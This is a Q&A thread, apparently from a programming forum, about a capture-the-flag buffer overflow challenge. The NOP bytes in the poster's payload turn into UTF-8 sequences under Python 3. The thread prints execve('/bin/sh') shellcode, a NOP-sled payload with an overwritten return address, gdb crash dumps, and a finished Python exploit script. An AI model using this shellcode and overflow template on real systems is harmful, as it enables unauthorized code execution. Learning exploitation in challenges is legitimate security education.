How to fix GDB probable charset issue NOP 0x90 translating to 0x90c2 in memory?

Question

I have a strange problem when working on a challenge and exploiting a executable in kali linux with gdb-peda.

#>gdb -q someVulnerableBinary
gdb-peda$ python
>shellcode=(
>"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
>)
>end
gdb-peda$ pset arg '"\x90"*(76-len(shellcode)) + shellcode + "\x08\x04\xb4\x10"[::-1] + "C"*10'
gdb-peda$ r
Starting program: /home/theDude/Downloads/tmp/someVulnerableBinary 'j
                          XRh//shh/binã1ÉÍ°CCCCCCCCCC'
j
                                                        XRh//shh/binã1ÉÍ°CCCCCCCCCC

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x804b410 --> 0x90c290c2 
EBX: 0x0 
ECX: 0x0 
EDX: 0x99 
ESI: 0x2 
EDI: 0xf7faf000 --> 0x1b2db0 
EBP: 0x90c290c2 
ESP: 0xffffda00 --> 0x90c290c2 
EIP: 0x90c290c2
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x90c290c2
[------------------------------------stack-------------------------------------]
0000| 0xffffda00 --> 0x90c290c2 
0004| 0xffffda04 --> 0x90c290c2 
0008| 0xffffda08 --> 0x90c290c2 
0012| 0xffffda0c --> 0x90c290c2 
0016| 0xffffda10 --> 0x90c290c2 
0020| 0xffffda14 --> 0x90c290c2 
0024| 0xffffda18 --> 0x90c290c2 
0028| 0xffffda1c --> 0xb6a90c2 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x90c290c2 in ?? ()
gdb-peda$
gdb-peda$ i r $eax
eax            0x804b410    0x804b410
gdb-peda$ x/20x $eax
0x804b410:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b420:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b430:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b440:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
0x804b450:  0x90c290c2  0x90c290c2  0x90c290c2  0x90c290c2
gdb-peda$ show charset
The host character set is "auto; currently UTF-8".
The target character set is "auto; currently UTF-8".
The target wide character set is "auto; currently UTF-32".

Tell me if you need more info about it, but apparently the translation in memory from the NOP \x90 is made to \x90c2 in memory. I cannot figure out why or even if it is the charset and how to change it at the moment. Beside of that i cannot find something similar via google or stackoverflow right now.

I appreciate your help and am already thanking for advices and helps.

This is unclear - the current problem seems to be that you have `0x90c290c2` in your program counter (presumably because you overwrote the return address on the stack). I'm not sure that has much to do with misinterpretation of the NOP opcode. — Oliver Charlesworth, Apr 18 '17 at 16:22
Start with getting %pc == 0x41424344 then worry about the shellcode. As stated, you're having issues getting program counter control which is step 1 — adam, Apr 27 '17 at 23:30

score 3 · Answer 1 · answered Jun 19 '17 at 07:57

I had the same problem when working on a challenge today. I'm not using gdb-peta, just regular gdb, but this post helped me. Basically \x90c2 is the hexadecimal encoding of the UTF-8 character U+0090. For me I encountered the problem because I have both Python 2 and Python 3 installed, Python 2 treats strings as byte arrays, and Python 3 treats them as arrays of UTF-8 encoded characters. As a solution, try using formatting such as b"\0x90" instead of "\0x90" in your call to pset arg. If gdb-peta doesn't let you do that, then you can print the input string via a call to Python 2 and pipe it in.

This gives me \x90c2 on the stack:

$ python3 -c "print '\x90',8" > input.txt
$ gdb ./vuln-program
(gdb) run arg1 < input.txt

Executing python2 instead gives me \x90 on the stack:

$ python2 -c "print '\x90',8" > input.txt
$ gdb ./vuln-program
(gdb) run arg1 < input.txt

In theory, the following should also give me \x90 on the stack:

$ python3 -c "print b'\x90',8" > input.txt
$ gdb ./vuln-program
(gdb) run arg1 < input.txt

In practice, the last input breaks for me because in my case vuln-program is looking for an ASCII string, not bytes, as input. I think Python 2's print function converts the byte array to a string when writing to a pipe, so for now I'm just using Python 2 to write exploit strings.

In your case, I haven't tested what is creating the conversion to UTF-8 encoding, but that call to python to create shellcode would at least be creating UTF-8 characters if you're running Python 3.

Maybe another poster can give you the exact syntax to fix this natively in gdb.

After a long break I returned once again to this challenge. And your hints lead me into the right direction. — Tschabadu, Sep 28 '17 at 08:49

score 1 · Answer 2 · answered Sep 28 '17 at 09:03

After a long break I returned once again to this challenge. And your hints lead me into the right direction.

After a little research I found this:

How to change the Python Interpreter that gdb uses?

And I found out that gdb is now using python3 and that it is possible to recompile it with python2, which would be one workaround to solve this issue with the characterset confusion.

As a better solution however I used the help of this link here:

Exploit development in Python 3

And did the following workaround (adopted to python2):

$ cat exploit.py

#!/bin/python2

shellcode = ""
shellcode += "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
offset=1231
nop = "\x90"
padding = "C"*10
eip = "\xff\xff\xff\xff"[::-1]
buff = nop*(offset-len(shellcode)) + shellcode + eip + padding
print buff

$ ./someVulnerableBinary \`python2 exploit.py\`

Which worked for me fine.

How to fix GDB probable charset issue NOP 0x90 translating to 0x90c2 in memory?

2 Answers2

Linked